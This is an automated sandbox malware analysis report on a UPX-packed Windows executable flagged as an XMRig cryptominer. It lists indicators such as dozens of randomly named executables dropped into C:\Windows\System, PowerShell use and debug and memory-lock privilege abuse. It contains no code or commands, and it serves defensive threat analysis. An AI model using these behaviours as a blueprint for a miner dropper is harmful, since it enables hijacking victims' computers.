Malware Analysis Report

2024-09-10 00:10

Sample ID 240613-kh5fha1epf
Target 6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe
SHA256 ecdbe031a1bf75d20430291ca97803672fda4346a4b8a57a08acf87ea2a3a563
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ecdbe031a1bf75d20430291ca97803672fda4346a4b8a57a08acf87ea2a3a563

Threat Level: Known bad

The file 6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 08:37

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 08:37

Reported

2024-06-13 08:39

Platform

win7-20240611-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\PaynJdn.exe N/A
N/A N/A C:\Windows\System\SdICGhJ.exe N/A
N/A N/A C:\Windows\System\TWezKKv.exe N/A
N/A N/A C:\Windows\System\HVBtvAf.exe N/A
N/A N/A C:\Windows\System\yTMbmAM.exe N/A
N/A N/A C:\Windows\System\NERXtYf.exe N/A
N/A N/A C:\Windows\System\vhRvbkc.exe N/A
N/A N/A C:\Windows\System\AegArYW.exe N/A
N/A N/A C:\Windows\System\SqEHUon.exe N/A
N/A N/A C:\Windows\System\QZKhCcc.exe N/A
N/A N/A C:\Windows\System\OLRzWEJ.exe N/A
N/A N/A C:\Windows\System\juHPVoF.exe N/A
N/A N/A C:\Windows\System\GrfVFrC.exe N/A
N/A N/A C:\Windows\System\OGLDlvo.exe N/A
N/A N/A C:\Windows\System\EqcNSLS.exe N/A
N/A N/A C:\Windows\System\aKgPLFT.exe N/A
N/A N/A C:\Windows\System\sZTDrbb.exe N/A
N/A N/A C:\Windows\System\EHtKsrW.exe N/A
N/A N/A C:\Windows\System\xYvCgoF.exe N/A
N/A N/A C:\Windows\System\WsNJIml.exe N/A
N/A N/A C:\Windows\System\MdPNyVR.exe N/A
N/A N/A C:\Windows\System\ZUrHLnP.exe N/A
N/A N/A C:\Windows\System\WwLPmpI.exe N/A
N/A N/A C:\Windows\System\LBxIMBF.exe N/A
N/A N/A C:\Windows\System\iUKmawF.exe N/A
N/A N/A C:\Windows\System\jxWTuiY.exe N/A
N/A N/A C:\Windows\System\aGYMHNL.exe N/A
N/A N/A C:\Windows\System\DblhNjB.exe N/A
N/A N/A C:\Windows\System\NjTtfFY.exe N/A
N/A N/A C:\Windows\System\wXvWunI.exe N/A
N/A N/A C:\Windows\System\ZsYlaCb.exe N/A
N/A N/A C:\Windows\System\FueHtBZ.exe N/A
N/A N/A C:\Windows\System\cDAqHsn.exe N/A
N/A N/A C:\Windows\System\UYGvAJx.exe N/A
N/A N/A C:\Windows\System\DVDQoZE.exe N/A
N/A N/A C:\Windows\System\cTBNWnW.exe N/A
N/A N/A C:\Windows\System\YEqcvaU.exe N/A
N/A N/A C:\Windows\System\RaYxYxS.exe N/A
N/A N/A C:\Windows\System\tuKjeQZ.exe N/A
N/A N/A C:\Windows\System\wzaeNyu.exe N/A
N/A N/A C:\Windows\System\vJbmQWs.exe N/A
N/A N/A C:\Windows\System\JzOUhid.exe N/A
N/A N/A C:\Windows\System\cZcQFrU.exe N/A
N/A N/A C:\Windows\System\yTNRzeK.exe N/A
N/A N/A C:\Windows\System\XCIrEBg.exe N/A
N/A N/A C:\Windows\System\qmqaFpj.exe N/A
N/A N/A C:\Windows\System\ZnzOPtg.exe N/A
N/A N/A C:\Windows\System\ijSjtHO.exe N/A
N/A N/A C:\Windows\System\AjbPtyH.exe N/A
N/A N/A C:\Windows\System\yNDebqN.exe N/A
N/A N/A C:\Windows\System\GVMfhMa.exe N/A
N/A N/A C:\Windows\System\ItUldSZ.exe N/A
N/A N/A C:\Windows\System\chfxXlx.exe N/A
N/A N/A C:\Windows\System\CtPeYtt.exe N/A
N/A N/A C:\Windows\System\WAhvnoO.exe N/A
N/A N/A C:\Windows\System\BejjybD.exe N/A
N/A N/A C:\Windows\System\qXUdJyy.exe N/A
N/A N/A C:\Windows\System\TPNShGD.exe N/A
N/A N/A C:\Windows\System\WpiINgU.exe N/A
N/A N/A C:\Windows\System\AUqdRGJ.exe N/A
N/A N/A C:\Windows\System\exhwDQq.exe N/A
N/A N/A C:\Windows\System\YRrUCbc.exe N/A
N/A N/A C:\Windows\System\AZXPcvp.exe N/A
N/A N/A C:\Windows\System\ekkEUcC.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\JzOByoQ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\DStuFGP.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\orDkZIH.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\cBrppgS.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\GAffVZL.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\oVnkOJY.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\zifRKDI.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\exhwDQq.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\lPsQzEu.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\kHsdhMt.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\EOtpsuy.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\gLXgclR.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\giPmprx.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\SiOALxI.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\nRDuiCh.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\SgQlZid.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\BGyxNoA.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\QvhojcE.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\WcMhJHv.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\IBNCdyx.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\MSnoRVO.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\lCtRomc.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\nUCrzwL.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\bFjdinB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\kjVFbNK.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\fVkKrbq.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\AZjJTCE.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\YRrUCbc.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\GgPbQQB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\UzLenjk.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\yGyjZWL.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZUiNFsd.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\IPLVAES.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\tDXAjOc.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\osAvihO.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\XEHoTIL.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\GOVIIGm.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\bEGdqKo.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\qRItvYy.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\BrtSZEj.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\KrXFmKZ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\gYpbRyG.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\yTzoofB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\EjfdjeX.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\ydkKmSa.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\ffIFgyM.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\CdHSVCa.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\NjTtfFY.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\dNKYXnh.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\uPbVncS.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\NaRiqId.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\eTJAwMs.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\SiPZTXz.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\vHSTQiZ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\DCAgoen.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\RiUEAVh.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\zzLjFcL.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\LMasNNN.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\tyaCuWc.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\QbyPXfC.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\xboUWtK.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\vstmLFB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\CmQLYvA.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\BceJTSe.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
